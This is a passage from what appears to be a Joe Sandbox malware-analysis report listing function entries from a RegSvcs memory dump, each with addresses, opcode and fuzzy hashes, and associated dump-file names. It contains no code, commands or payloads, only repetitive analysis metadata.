                                                                                            • Instruction ID: 5251e282e97c0753ce549a77d679912a6ca153470604fefa85fce7409f84d672
                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                            • Instruction Fuzzy Hash: 6FD0A932A08660ABDB32AA1CFC00FC333E9AB88B20F060459B008C7160C3A4AC81DA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEE908 Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction ID: ff90cbf2c90452be4d5617f1b6c1c961014ef9ca7bd4134aa9b747861fd61a7c
                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction Fuzzy Hash: 80E0EC759506849BCF12EF59EA41F5EB7F9BB85B50F150054A0086B662C628AD00DB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction ID: bb942951e78d03659cd6211df682a8da6ac66f1aa73cd98748ec9d27afc29c44
                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction Fuzzy Hash: 4CD01233616070A7CB2966656D14FA779559B82BA4F1A006D780AB3910C5198C42FAE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAA830 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction ID: 6ccd74eb80589b80fdc6eac700927d29733241298fa78fbcf2cab3f6b2f0be5f
                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction Fuzzy Hash: C9D012771D054CBBCB11AF65DC02F957BA9E755BA0F444020B504875A1C63AE950D684
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FACA24 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                                                                            • Instruction ID: ace091a7c32a31d39d27ea6c814642a88507b5baac52e17c6f7b2b33b7d0f06c
                                                                                            • Opcode Fuzzy Hash: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                                                                            • Instruction Fuzzy Hash: 2BD0A775901446CBCF16EF05C925E7E36B0EB14780B400068F60051170D72DDC02F740
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F802A0 Relevance: .0, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction ID: 07bc3ab2d4943e5df7beb9e902946e6062a7d57097f66f9a647d93206eeb4c54
                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction Fuzzy Hash: 27D09235612A80CFC65A8B08C5A9B5533A4BB44B44FC504A0E401CBB61DA68E944DA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAC700 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: 7bd1d72aae6e16c2b903a27439403c1f7f86a8ee32d6fc3f3ae043e0f9b330ae
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: DAC01232290648AFC712AA98DD02F427BA9EB98B40F000021F2048B671C635E920EA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6E0D0 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 560c2847e2b4daab8fabc945da4054ba1cb178f3f8264a975cbe554ffed8f557
                                                                                            • Instruction ID: 0a636925bc53d86c7feac3fd959c25aea8236fc2779cece619758f5465513b87
                                                                                            • Opcode Fuzzy Hash: 560c2847e2b4daab8fabc945da4054ba1cb178f3f8264a975cbe554ffed8f557
                                                                                            • Instruction Fuzzy Hash: E6C04CF7B110A0AA8714DB619805B76758A93D5301F45C069B1A9C6148DA3FC401AA64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F90310 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: 5ce0f3d3b197473fe25212292d7614164be1b0149d1f09c9e4408cbe79f75d9c
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 20D01236100248EFCB01DF41C890D9A772AFBC8710F508019FD1907611CA35ED62DA50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F70750 Relevance: .0, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 1002cbe19735b7ac597ce781fc831a44117540e36f9eb93316ce0e23e910baca
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: 4AC04C757015458FCF15DB19D795F4577E4F744750F150890E805CB721E724FD01DA10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB4340 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2bcde72a48987cda9e05cb18894558b581f6d66ed1014cda4d504addc06c8326
                                                                                            • Instruction ID: 199a32aab5e0b2578fd4e6a743eb73ac95ad9e66f9600a2c68d472326d8aed90
                                                                                            • Opcode Fuzzy Hash: 2bcde72a48987cda9e05cb18894558b581f6d66ed1014cda4d504addc06c8326
                                                                                            • Instruction Fuzzy Hash: D890023160580122924071598985A46400597E0341B55C026E0424554D8E198A576361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB4650 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe54f9643be165f00af676392167d74efb598cb58e4728d8b34feceaee9aed57
                                                                                            • Instruction ID: e251afa8333ef9c0a9075f5cfa494c79900d498e8a93cbf5ea8ec03aa823952b
                                                                                            • Opcode Fuzzy Hash: fe54f9643be165f00af676392167d74efb598cb58e4728d8b34feceaee9aed57
                                                                                            • Instruction Fuzzy Hash: 7790026160150152424071598905906600597E1341395C12AA0554560D8A1D8956A269
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37b48f42b23d19792e54fa914450baf6b87684b48cb722a23df3a0443c8a39db
                                                                                            • Instruction ID: ebd761d3fc866da883a5088b339a027de83f27527258f94f065a50313fe2decf
                                                                                            • Opcode Fuzzy Hash: 37b48f42b23d19792e54fa914450baf6b87684b48cb722a23df3a0443c8a39db
                                                                                            • Instruction Fuzzy Hash: BB900225221401120245B5594705A0B044597D6391395C02AF1416590DCA2689666321
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70f8a3096735f774ed7d1df2008235f3234813ab998dcf4c5e9ea8b07b51b342
                                                                                            • Instruction ID: 99eb4c3a220f288b4c67c36a758504f9db74ebe474d3626f9c9ca70bf68483c6
                                                                                            • Opcode Fuzzy Hash: 70f8a3096735f774ed7d1df2008235f3234813ab998dcf4c5e9ea8b07b51b342
                                                                                            • Instruction Fuzzy Hash: DB9002A1201541A24600B259C505F0A450587E0341B55C02BE1054560DC92A8952A135
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 901e9813865d6156d14b646b5e8568b3cdf80b1ab2a999b1c6d0e4e7c00b025e
                                                                                            • Instruction ID: 5e8201d9aeaf953534879c85dd91c39d4b2a92468df0dbdfc6d44bdb4a224a08
                                                                                            • Opcode Fuzzy Hash: 901e9813865d6156d14b646b5e8568b3cdf80b1ab2a999b1c6d0e4e7c00b025e
                                                                                            • Instruction Fuzzy Hash: F290023120544952D24071598505F46001587D0345F55C026A0064694E9A2A8E56B661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58079957634caf520aa5578f9e11ebea291a151fbd8f9cfdd31692a60a6432c1
                                                                                            • Instruction ID: 2570fffeecd42f50bf4140091a2858a18c779015a40dc8e5d4a16874ec804ae5
                                                                                            • Opcode Fuzzy Hash: 58079957634caf520aa5578f9e11ebea291a151fbd8f9cfdd31692a60a6432c1
                                                                                            • Instruction Fuzzy Hash: 2790023160540912D25071598515B46000587D0341F55C026A0024654E8B5A8B5676A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2B80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: faee87bab6a1a31dc814febda3b7b220fa2f5a242cf6aaa8b11f7b368bc9d8eb
                                                                                            • Instruction ID: c52b8c2ea6cb0448a13ae86904d3200316a9ae1f5e9c4558db1169e76f863348
                                                                                            • Opcode Fuzzy Hash: faee87bab6a1a31dc814febda3b7b220fa2f5a242cf6aaa8b11f7b368bc9d8eb
                                                                                            • Instruction Fuzzy Hash: BC90023120140912D20471598905B86000587D0341F55C026A6024655F9A6A89927131
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03933079a2ff41feb9591ce3649a9db34f71425ffbdcd38bbd4de103378d2227
                                                                                            • Instruction ID: cdf690bd7675f01a11469aba6155187fe744885e3dacc795f25322d39552744d
                                                                                            • Opcode Fuzzy Hash: 03933079a2ff41feb9591ce3649a9db34f71425ffbdcd38bbd4de103378d2227
                                                                                            • Instruction Fuzzy Hash: D290023120140513D20071599609B07000587D0341F55D426A0424558EDA5B89527121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be6033f21e24675d02078283ef775afa1d477a704b091b93622302e822995747
                                                                                            • Instruction ID: eb524d8636deaa8c73fbff1303b8c3c13fcbf98c95167879a392f810e9c82eaa
                                                                                            • Opcode Fuzzy Hash: be6033f21e24675d02078283ef775afa1d477a704b091b93622302e822995747
                                                                                            • Instruction Fuzzy Hash: 8E90022160540512D24071599519B06001587D0341F55D026A0024554ECA5E8B5676A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2C60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
